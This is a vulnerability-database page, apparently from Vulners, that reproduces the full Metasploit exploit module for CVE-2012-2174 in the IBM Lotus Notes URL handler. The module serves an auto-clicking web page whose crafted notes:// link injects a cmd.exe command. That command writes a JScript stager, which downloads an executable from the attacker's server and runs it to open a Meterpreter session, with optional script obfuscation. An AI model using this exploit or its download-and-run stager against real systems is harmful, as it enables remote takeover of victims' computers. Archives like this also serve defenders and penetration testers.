Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

IBM Lotus Notes Client URL Handler Command Injection Vulnerability

🗓️ 25 Dec 2012 00:00:00Reported by metasploitType 
zdt
 zdt🔗 0day.today👁 31 Views

IBM Lotus Notes Client URL Handler Command Injection Vulnerability. Exploits vulnerability in URL handler for IBM Lotus Notes Client <= 8.5.3. Allows execution of arbitrary commands and arguments via specially crafted notes:// URL

Related
Code
ReporterTitlePublishedViews
Family
Check Point Advisories		IBM Lotus Notes URL Handler Command Execution (CVE-2012-2174)
14 Oct 201200:00
checkpoint_advisories
CVE		CVE-2012-2174
20 Jun 201210:00
cve
Cvelist		CVE-2012-2174
20 Jun 201210:00
cvelist
d2		DSquare Exploit Pack: D2SEC_NOTESURL
20 Jun 201210:27
d2
Exploit DB		IBM Lotus Notes Client URL Handler - Command Injection (Metasploit)
25 Dec 201200:00
exploitdb
Tenable Nessus		IBM Lotus Notes < 8.5.3 FP2 URL Handler Unspecified Remote Code Execution
10 Aug 201200:00
nessus
Metasploit		IBM Lotus Notes Client URL Handler Command Injection
24 Dec 201215:23
metasploit
NVD		CVE-2012-2174
20 Jun 201210:27
nvd
OpenVAS		IBM Lotus Notes URL Command Injection RCE Vulnerability - Windows
23 Jan 201300:00
openvas
OpenVAS		IBM Lotus Notes URL Command Injection RCE Vulnerability (Windows)
23 Jan 201300:00
openvas
Rows per page
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking
 
    include Msf::Exploit::Remote::HttpServer::HTML
    include Msf::Exploit::EXE
    include Msf::Exploit::FileDropper
 
    def initialize(info={})
        super(update_info(info,
            'Name'           => "IBM Lotus Notes Client URL Handler Command Injection",
            'Description'    => %q{
                    This modules exploits a command injection vulnerability in the URL handler for
                for the IBM Lotus Notes Client <= 8.5.3. The registered handler can be abused with
                an specially crafted notes:// URL to execute arbitrary commands with also arbitrary
                arguments. This module has been tested successfully on Windows XP SP3 with IE8,
                Google Chrome 23.0.1271.97 m and IBM Lotus Notes Client 8.5.2.
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'Moritz Jodeit', # Vulnerability discovery
                    'Sean de Regge', # Vulnerability analysis
                    'juan vazquez' # Metasploit
                ],
            'References'     =>
                [
                    [ 'CVE', '2012-2174' ],
                    [ 'OSVDB', '83063' ],
                    [ 'BID', '54070' ],
                    [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-154/' ],
                    [ 'URL', 'http://pwnanisec.blogspot.com/2012/10/exploiting-command-injection.html' ],
                    [ 'URL', 'http://www-304.ibm.com/support/docview.wss?uid=swg21598348' ]
                ],
            'Payload'        =>
                {
                    'Space'           => 2048,
                    'StackAdjustment' => -3500
                },
            'DefaultOptions'  =>
                {
                    'EXITFUNC'         => "none",
                    'InitialAutoRunScript' => 'migrate -k -f'
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [ 'Automatic', {} ]
                ],
            'Privileged'     => false,
            'DisclosureDate' => "Jun 18 2012",
            'DefaultTarget'  => 0))
 
        register_options(
            [
                OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
            ], self.class)
    end
 
    def exploit
        @exe_name = rand_text_alpha(2) + ".exe"
        @stage_name = rand_text_alpha(2) + ".js"
        super
    end
 
    def on_new_session(session)
        if session.type == "meterpreter"
            session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
        end
 
        @dropped_files.delete_if do |file|
            win_file = file.gsub("/", "\\\\")
            if session.type == "meterpreter"
                begin
                    wintemp = session.fs.file.expand_path("%TEMP%")
                    win_file = "#{wintemp}\\#{win_file}"
                    # Meterpreter should do this automatically as part of
                    # fs.file.rm().  Until that has been implemented, remove the
                    # read-only flag with a command.
                    session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
                    session.fs.file.rm(win_file)
                    print_good("Deleted #{file}")
                    true
                rescue ::Rex::Post::Meterpreter::RequestError
                    print_error("Failed to delete #{win_file}")
                    false
                end
 
            end
        end
 
    end
 
    def on_request_uri(cli, request)
 
        if request.uri =~ /\.exe$/
            return if ((p=regenerate_payload(cli))==nil)
            register_file_for_cleanup("#{@stage_name}") unless @dropped_files and @dropped_files.include?("#{@stage_name}")
            register_file_for_cleanup("#{@exe_name}") unless @dropped_files and @dropped_files.include?("#{@exe_name}")
            data = generate_payload_exe({:code=>p.encoded})
            print_status("Sending payload")
            send_response(cli, data, {'Content-Type'=>'application/octet-stream'})
            return
        end
 
        my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
        if datastore['SSL']
            schema = "https"
        else
            schema = "http"
        end
        uri = "#{schema}://#{my_host}"
        uri << ":#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.exe"
 
        script = "var w=new ActiveXObject('wscript.shell');"
        script << "w.CurrentDirectory=w.ExpandEnvironmentStrings('\\%TEMP\\%');"
        script << "var x=new ActiveXObject('Microsoft.XMLHTTP');"
        script << "x.open('GET','#{uri}', false);"
        script << "x.send();"
        script << "var s=new ActiveXObject('ADODB.Stream');"
        script << "s.Mode=3;"
        script << "s.Type=1;"
        script << "s.Open();"
        script << "s.Write(x.responseBody);"
        script << "s.SaveToFile('#{@exe_name}',2);"
        script << "w.Run('#{@exe_name}');"
 
        vmargs = "/q /s /c echo #{script} > %TEMP%\\\\#{@stage_name}& start cscript %TEMP%\\\\#{@stage_name}& REM"
 
        link_id = rand_text_alpha(5 + rand(5))
 
        js_click_link = %Q|
        function clickLink(link) {
            var cancelled = false;
 
            if (document.createEvent) {
                var event = document.createEvent("MouseEvents");
                event.initMouseEvent("click", true, true, window,
                    0, 0, 0, 0, 0,
                    false, false, false, false,
                    0, null);
                cancelled = !link.dispatchEvent(event);
            }
            else if (link.fireEvent) {
                cancelled = !link.fireEvent("onclick");
            }
 
            if (!cancelled) {
                window.location = link.href;
            }
        }
        |
 
        if datastore['OBFUSCATE']
            js_click_link = ::Rex::Exploitation::JSObfu.new(js_click_link)
            js_click_link.obfuscate
            js_click_link_fn = js_click_link.sym('clickLink')
        else
            js_click_link_fn = 'clickLink'
        end
 
 
        html = <<-EOS
        <html>
        <head>
        <script>
        #{js_click_link}
        </script>
        </head>
        <body onload="#{js_click_link_fn}(document.getElementById('#{link_id}'));">
        <a id="#{link_id}" href="notes://#{rand_text_alpha_upper(3+rand(3))}/#{rand_text_alpha_lower(3+rand(3))} -RPARAMS java -vm c:\\windows\\system32\\cmd.exe -vmargs #{vmargs}"></a>
        </body>
        </html>
        EOS
 
        print_status("Sending html")
        send_response(cli, html, {'Content-Type'=>'text/html'})
 
    end
 
end

#  0day.today [2018-01-02]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 Dec 2012 00:00Current
7.1High risk
Vulners AI Score7.1
EPSS0.64625
ibmlotus notescommand injectionvulnerabilityurl handlerarbitrary commands
31